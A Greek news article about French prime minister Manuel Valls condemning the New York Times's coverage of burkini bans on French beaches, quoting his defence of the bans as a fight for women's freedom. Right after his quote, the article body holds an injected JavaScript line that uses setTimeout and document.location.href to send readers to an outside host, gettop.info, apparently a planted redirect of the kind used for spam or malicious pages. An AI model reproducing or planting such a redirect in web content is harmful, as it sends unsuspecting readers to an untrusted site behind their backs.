Μανουέλ Βαλς κατά New York Times για το μπουρκίνι

0
6

 

Ολομέτωπη επίθεση εναντίον της εφημερίδας New York Times εξαπέλυσε ο Γάλλος πρωθυπουργός Μανουέλ Βαλς κατηγορώντας την για «απαράδεκτη απεικόνιση της χώρας του» αναφορικά με το θέμα απαγόρευσης του μπουρκίνι στις παραλίες της Γαλλίας, ενώ την ίδια ώρα δικαστικές αποφάσεις στη Γαλλία έθεσαν τέλος στις… απαγορεύσεις.

Ο Βαλς πάντως υποστήριξε ότι αυτές οι απαγορεύσεις αποτελούν μέρος της πάλης «για την ελευθερία των γυναικών». Υποστήριξε ακόμη ότι η εφημερίδα σε άρθρο της απεικονίζει «με απαράδεκτο και λαθεμένο τρόπο τη Γαλλία».

Στο επίμαχο άρθρο των New York Times μουσουλμάνες της Γαλλίας δηλώνουν ότι το συγκεκριμένο ένδυμα, που καλύπτει σχεδόν όλο το σώμα, αποτελεί ευκαιρία για εκείνες να προβαίνουν σε δραστηριότητες, όπως το μπάνιο στη θάλασσα, χωρίς να έρχονται σε δυσαρμονία με τις θρησκευτικές τους αντιλήψεις.

«Παλεύουμε για την ελευθερία των γυναικών, ώστε αυτές να μην υπόκεινται στο ζυγό μιας σωβινιστικής τάξης πραγμάτων. Το γυναικείο σώμα δεν είναι ούτε αγνό, ούτε ακάθαρτο. Είναι απλώς το γυναικείο σώμα. Και δεν πρέπει να κρύβεται επειδή τάχα αποτελεί κάποιον πειρασμό. Στις συγκεκριμένες δηλώσεις, το μπουρκίνι παρουσιάζεται ως όργανο απελευθέρωσης των γυναικών!» δήλωσε ο Μανουέλ Βαλς. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here